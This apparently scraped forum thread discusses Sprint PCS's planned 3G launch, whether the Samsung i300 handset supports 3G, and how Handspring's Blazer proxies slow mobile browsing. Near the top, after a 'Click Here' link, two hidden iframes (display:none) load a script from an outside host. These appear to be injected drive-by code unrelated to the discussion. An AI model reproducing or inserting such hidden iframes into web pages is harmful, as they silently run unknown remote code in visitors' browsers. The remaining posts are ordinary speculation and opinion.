+ Reply to Thread

The latest Sprint 3g Info

Some interesting stuff here:

Click Here<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Looking at another link there, the date for 3G launch is given as "mid-2002". Whenever a company is that vague it usually means they're still a long way from working out the details, but if we take them at their word then we're looking at June-July. Now the question is: Do they really plan a nationwide rollout, or will it only be available in certain markets at first?

Either way, I don't think our little phones are going to be obsolete for a while yet.

This phone is so close to perfect in most other respects -- if Samsung offers the exact same phone but with 3G packet networking supported, I'd probably buy it over any other.

They may be preparing to shoot themselves in the foot by releasing this technology nationally. I believe a soft introduction is planned.

3G compatible

(in response to Harangutan)
    I was told my a SprintPCS tech when I bought the phone and grilled him with every question I could fathom... that this phone is 3G ready and will be able to handle that technology when it is rolled out.

techs dont know anything with all these claims that it WONT be 3g ready, against 1 sprint tech, id rather trust the masses, on all the reviews of hte i300 where they mention 3g technology, they mention that the i300 is NOT 3g ready.

Re: 3G compatible

Originally posted by Austin_Techie
    (in response to Harangutan)
    I was told my a SprintPCS tech when I bought the phone and grilled him with every question I could fathom... that this phone is 3G ready and will be able to handle that technology when it is rolled out.
    Just for grins, what else did he tell you? We can (hopefully) give the real anwsers here.

widow's son
    By the way, you can drag your i300 back to the SprintStore you bought it from and raise holy hell with them for lying to you. Have them exchange it for the one that will do 3g, when it comes out.

Too bad you didn't get it in writing from the guy. Then you could have threatened to file suit, and gotten a refund and a free 3g phone to boot.

America! What a country!?!

Administrator

Arrow

the i300 is not able to take advantage of the 3g technology..

it WILL work on the infrastructure though...(its backwards compatibile)

perhaps the techie meant that. :p

Anyone get PC world?

There was an editorial in the latest PCworld talking about broadband. Apperantly 3G in europe is maxing out about 9600kbps. Yea, slow! Not as slow as the phones now, but not as fast as the 384k they are touting. I got to thinking about it, what type of hardware would they have to run inorder to get enought bandwitdh to each tower? Seems like alot of work to get enought for every cellsite to support much of anything...

Re: Anyone get PC world?

Originally posted by tomas316
    Not as slow as the phones now, but not as fast as the 384k they are touting.
    Our phones are faster than 9600.
    Carl

14.4 is slow by any standard, but Blazer (probably safe to say it's the browser nearly everyone uses) itself has lots of inefficiencies of its own that cause the real throughput to drop to 6kbit or less in normal use.

1) Blazer depends upon Handspring's proxies.

2) Images are delivered to the phone one at a time... and judging from the timestamps in the log on my web server, the images themselves seem to be REQUESTED by the proxy farm one at a time, on a strictly "as needed" basis. In other words, if there are five images on the page, Handspring's proxy farm doesn't even try to fetch image #2 from the real web server until it's finished sending image #1 to Blazer. Delay, delay, delay...

3) I'm not sure what kind of bandwidth Handspring has behind their proxy farm, but I suspect it's not nearly as generous as we'd like. Add more delay.

The whole thing reminds me of AOL about 3 years ago (before they acquired Compuserve to upgrade their dialup infrastructure)... they were constantly blaming slow data transfer rates on dialup modem speeds, glossing over the fact that users couldn't even sustain 33kbit data rates under even ideal conditions, regardless of what the connection speed was. Or like having a T1 in 1997 from a mom & pop ISP with 500 T1 customers sharing THREE upstream T1 lines (themselves serviced by a second- or third-tier provider)